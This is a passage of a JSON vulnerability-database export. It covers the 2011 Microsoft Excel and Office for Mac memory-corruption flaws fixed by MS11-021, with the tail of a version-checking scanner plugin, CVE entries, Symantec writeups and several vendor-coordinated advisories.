i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '11.6.3';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Open XML File Format Converter for Mac';\nplist = \"/Applications/Open XML Converter.app/Contents/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '1.1.9';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\n\n# Report findings.\nif (info)\n{\n gs_opt = get_kb_item(\"global_settings/report_verbosity\");\n if (gs_opt && gs_opt != 'Quiet') security_hole(port:0, extra:info);\n else security_hole(0);\n\n exit(0);\n}\nelse\n{\n if (max_index(keys(installs)) == 0) exit(0, \"Office for Mac / Open XML File Format Converter is not installed.\");\n else\n {\n msg = 'The host has ';\n foreach prod (sort(keys(installs)))\n msg += prod + ' ' + installs[prod] + ' and ';\n msg = substr(msg, 0, strlen(msg)-1-strlen(' and '));\n\n msg += ' installed and thus is not affected.';\n\n exit(0, msg);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:11:06", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010; Office 2004, 2008, and 2011 for Mac; Open XML File Format Converter for Mac; and Excel Viewer SP2 do not properly handle errors during the parsing of Office Art records in Excel spreadsheets, which allows remote attackers to execute arbitrary code via a malformed object record, related to a \"stray reference,\" aka \"Excel Linked List Corruption Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0979", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0979", "published": "2011-02-10T19:00:00", "title": "CVE-2011-0979", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:06", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2; Office 2004 for Mac; Excel Viewer SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP2 allows remote attackers to execute arbitrary code via vectors related to an axis properties record, and improper incrementing of an array index, aka \"Excel Array Indexing Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0978", "published": "2011-02-10T19:00:00", "title": "CVE-2011-0978", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac obtain a certain length value from an uninitialized memory location, which allows remote attackers to trigger a buffer overflow and execute arbitrary code via a crafted Excel file, aka \"Excel Data Initialization Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0105", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0105", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0105", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka \"Excel Buffer Overwrite Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0104", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0104", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0104", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Integer signedness error in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Excel Viewer SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP2 allows remote attackers to execute arbitrary code via an XLS file with a large record size, aka \"Excel Heap Overflow Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0098", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0098", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:06", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse Office Art objects, which allows remote attackers to execute arbitrary code via vectors related to a function pointer, aka \"Excel Dangling Pointer Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0980", "published": "2011-02-10T19:00:00", "title": "CVE-2011-0980", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Integer underflow in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Excel Viewer SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP2 allows remote attackers to execute arbitrary code via a crafted 400h substream in an Excel file, which triggers a stack-based buffer overflow, aka \"Excel Integer Overrun Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0097", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0097", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted record information in an Excel file, aka \"Excel Memory Corruption Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0103", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0103", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted RealTimeData record, related to a stTopic field, double-byte characters, and an incorrect pointer calculation, aka \"Excel Record Parsing WriteAV Vulnerability.\"", "modified": "2018-10-12T21:59:00", "id": "CVE-2011-0101", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0101", "published": "2011-04-13T18:55:00", "title": "CVE-2011-0101", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-12T06:25:11", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Excel is prone to a heap-based buffer-overflow vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Excel 2002 \n * Microsoft Excel 2002 SP1 \n * Microsoft Excel 2002 SP2 \n * Microsoft Excel 2002 SP3 \n * Microsoft Excel 2003 \n * Microsoft Excel 2003 Gold \n * Microsoft Excel 2003 SP1 \n * Microsoft Excel 2003 SP2 \n * Microsoft Excel 2003 SP3 \n * Microsoft Excel 2007 \n * Microsoft Excel 2007 SP1 \n * Microsoft Excel 2007 SP2 \n * Microsoft Excel 2010 \n * Microsoft Excel \n * Microsoft Excel Viewer \n * Microsoft Excel Viewer SP1 \n * Microsoft Excel Viewer SP2 \n * Microsoft Office 2004 for Mac \n * Microsoft Office 2008 for Mac \n * Microsoft Office Compatibility Pack 2007 \n * Microsoft Office Compatibility Pack 2007 SP1 \n * Microsoft Office Compatibility Pack 2007 SP2 \n * Microsoft Open XML File Format Converter for Mac \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "modified": "2011-04-12T00:00:00", "published": "2011-04-12T00:00:00", "id": "SMNTC-47235", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/47235", "type": "symantec", "title": "Microsoft Excel CVE-2011-0098 Heap Based Buffer Overflow Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T04:24:54", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Excel is prone to a buffer-overflow vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Excel 2002 \n * Microsoft Excel 2002 SP1 \n * Microsoft Excel 2002 SP2 \n * Microsoft Excel 2002 SP3 \n * Microsoft Excel 2003 \n * Microsoft Excel 2003 Gold \n * Microsoft Excel 2003 SP1 \n * Microsoft Excel 2003 SP2 \n * Microsoft Excel 2003 SP3 \n * Microsoft Office 2004 for Mac \n * Microsoft Office 2008 for Mac \n * Microsoft Open XML File Format Converter for Mac \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "modified": "2011-04-12T00:00:00", "published": "2011-04-12T00:00:00", "id": "SMNTC-47245", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/47245", "type": "symantec", "title": "Microsoft Excel CVE-2011-0104 Buffer Overflow Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T12:08:07", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Excel is prone to a memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Excel 2002 \n * Microsoft Excel 2002 SP1 \n * Microsoft Excel 2002 SP2 \n * Microsoft Excel 2002 SP3 \n * Microsoft Excel 2003 \n * Microsoft Excel 2003 Gold \n * Microsoft Excel 2003 SP1 \n * Microsoft Excel 2003 SP2 \n * Microsoft Excel 2003 SP3 \n * Microsoft Office 2004 for Mac \n * Microsoft Office 2008 for Mac \n * Microsoft Open XML File Format Converter for Mac \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "modified": "2011-04-12T00:00:00", "published": "2011-04-12T00:00:00", "id": "SMNTC-47244", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/47244", "type": "symantec", "title": "Microsoft Excel CVE-2011-0103 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "Multiple memory corruptions in Excel and PowerPoint, unsafe DLL loading, memory corruption in Office Graphic.", "modified": "2011-04-17T00:00:00", "published": "2011-04-17T00:00:00", "id": "SECURITYVULNS:VULN:11580", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11580", "title": "Microsoft Office multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "VUPEN Security Research - Microsoft Office Excel Real Time Data Stack \r\nOverwrite Vulnerability (CVE-2011-0105)\r\n\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Office Excel is a powerful tool you can use to create and format\r\nspreadsheets, and analyze and share information to make more informed\r\ndecisions. With the Microsoft Office Fluent user interface, rich data\r\nvisualization, and PivotTable views, professional-looking charts are easier\r\nto create and use." (microsoft.com)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Office Excel.\r\n\r\nThe vulnerability is caused by a stack overwrite error when parsing the RTD\r\nRealTimeData record (0813h), which could be exploited by attackers to\r\ncompromise a vulnerable system by tricking a user into opening a specially\r\ncrafted Excel document.\r\n\r\nCVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Office 2008 for Mac\r\nMicrosoft Office 2004 for Mac\r\nMicrosoft Excel 2002 Service Pack 3\r\nOpen XML File Format Converter for Mac\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth binary analysis of the vulnerability and a code execution exploit\r\nare available through the VUPEN Binary Analysis & Exploits Service :\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nTo proactively protect critical networks and infrastructures against \r\nunpatched\r\nvulnerabilities and reduce risks related to zero-day attacks, VUPEN shares \r\nits\r\nvulnerability research with governments and organizations members of the \r\nVUPEN\r\nThreat Protection Program (TPP).\r\n\r\nVUPEN TPP customers receive fully detailed and technical reports about \r\nsecurity\r\nvulnerabilities discovered by VUPEN and in advance of their public \r\ndisclosure.\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply the MS11-021 security update.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Nicolas Joly of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is a leading IT security research company providing vulnerability\r\nmanagement and security intelligence solutions which enable enterprises\r\nand institutions to eliminate vulnerabilities before they can be exploited,\r\nensure security policy compliance and meaningfully measure and manage risks.\r\n\r\nGovernmental and federal agencies, and global enterprises in the financial\r\nservices, insurance, manufacturing and technology industries rely on VUPEN\r\nto improve their security, prioritize resources, cut time and costs, and\r\nstay ahead of the latest threats.\r\n\r\n* VUPEN Vulnerability Notification Service (VNS) :\r\nhttp://www.vupen.com/english/services/vns-index.php\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program for Govs (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n* VUPEN Web Application Security Scanner (WASS) :\r\nhttp://www.vupen.com/english/services/wass-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://www.vupen.com/english/research-vuln.php\r\nhttp://www.vupen.com/english/advisories/2011/0940\r\nhttp://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2010-10-10 - Vulnerability Discovered by VUPEN\r\n2011-04-12 - MS11-021 security update available\r\n", "modified": "2011-04-17T00:00:00", "published": "2011-04-17T00:00:00", "id": "SECURITYVULNS:DOC:26146", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26146", "title": "VUPEN Security Research - Microsoft Office Excel Real Time Data Stack Overwrite Vulnerability (CVE-2011-0105)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "iDefense Security Advisory 04.12.11\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nApr 12, 2011\r\n\r\nI. BACKGROUND\r\n\r\nExcel is the spreadsheet application included with Microsoft Corp.'s\r\nOffice productivity software suite. More information is available at\r\nthe following website:\r\n\r\nhttp://office.microsoft.com/excel/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a memory corruption vulnerability in Microsoft\r\nCorp.'s Excel could allow an attacker to execute arbitrary code with\r\nthe privileges of the current user.\r\n\r\nThe vulnerability occurs when Excel parses a specially crafted Excel\r\nfile. Specific values within this file can trigger a memory corruption\r\nvulnerability and may allow arbitrary code execution.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability results in the execution of arbitrary\r\ncode with the privileges of the user opening the file. To exploit this\r\nvulnerability, an attacker needs to convince a user to open a malicious\r\nfile. Attackers typically accomplish this by e-mailing a targeted user\r\nthe file or hosting the file on a Web page.\r\n\r\nIV. DETECTION\r\n\r\nThe following Microsoft products are vulnerable: <ul> <li> Excel 2002\r\nSP3</li> <li> Excel 2002 SP3</li> <li> Excel 2003 SP3</li> <li> Office\r\n2004 for Mac</li> <li> Office 2008 for Mac</li> <li> Open XML File\r\nFormat Converter for Mac </li> </ul>\r\n\r\nV. WORKAROUND\r\n\r\nThe vulnerability occurs in the core parsing code of Excel, and this\r\ncode can not be disabled; however, it is possible to disable the\r\nopening of the older binary format files and use MOICE to convert the\r\nfile to the newer XML-based format.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nMicrosoft Corp. has released patches which address this issue.\r\nInformation about downloadable vendor updates can be found by clicking\r\non the URLs shown.\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2011-0103 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/09/2010 Initial Vendor Notification\r\n09/09/2010 Initial Vendor Reply\r\n04/12/2011 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2011 Verisign\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "modified": "2011-04-13T00:00:00", "published": "2011-04-13T00:00:00", "id": "SECURITYVULNS:DOC:26111", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26111", "title": "iDefense Security Advisory 04.12.11: Microsoft Excel Memory Corruption Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code\r\nExecution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-121\r\n\r\nApril 12, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0105\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nMicrosoft\r\n\r\n-- Affected Products:\r\nMicrosoft Office Excel\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11033. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Office Excel. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the application's parsing of a\r\nparticular record within a Microsoft Excel Compound Document. When\r\nspecifying a particular value, the application will fail to initialize a\r\nvariable that is used as the length of a memcpy operation. Due to the\r\nusage of the uninitialized value, with proper control of the program\r\nflow an attacker can force a length of their own choosing for the memcpy\r\noperation. This will cause a buffer overflow and can lead to code\r\nexecution under the context of the application.\r\n\r\n-- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\r\n\r\n-- Disclosure Timeline:\r\n2010-10-18 - Vulnerability reported to vendor\r\n2011-04-12 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Aniway (Aniway.Anyway AT gmail DOT com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-04-13T00:00:00", "published": "2011-04-13T00:00:00", "id": "SECURITYVULNS:DOC:26115", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26115", "title": "ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-120\r\n\r\nApril 12, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0101\r\n\r\n-- CVSS:\r\n9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)\r\n\r\n-- Affected Vendors:\r\nMicrosoft\r\n\r\n-- Affected Products:\r\nMicrosoft Office Excel 2002\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 10872. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Office Excel. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe flaw exists within the methods used for RealTimeData Record Parsing.\r\nWhen handling a stTopic field has a bit set specifying double byte\r\ncharacters in the following field the value of a global pointer is\r\nimproperly calculated. This pointer is later used in a memcpy operation\r\nwhose source is user supplied data. A remote attacker can exploit this\r\nvulnerability to execute arbitrary code under the context of the user.\r\n\r\n-- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\r\n\r\n-- Disclosure Timeline:\r\n2010-11-15 - Vulnerability reported to vendor\r\n2011-04-12 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Aniway (Aniway.Anyway AT gmail DOT com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-04-13T00:00:00", "published": "2011-04-13T00:00:00", "id": "SECURITYVULNS:DOC:26108", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26108", "title": "ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": 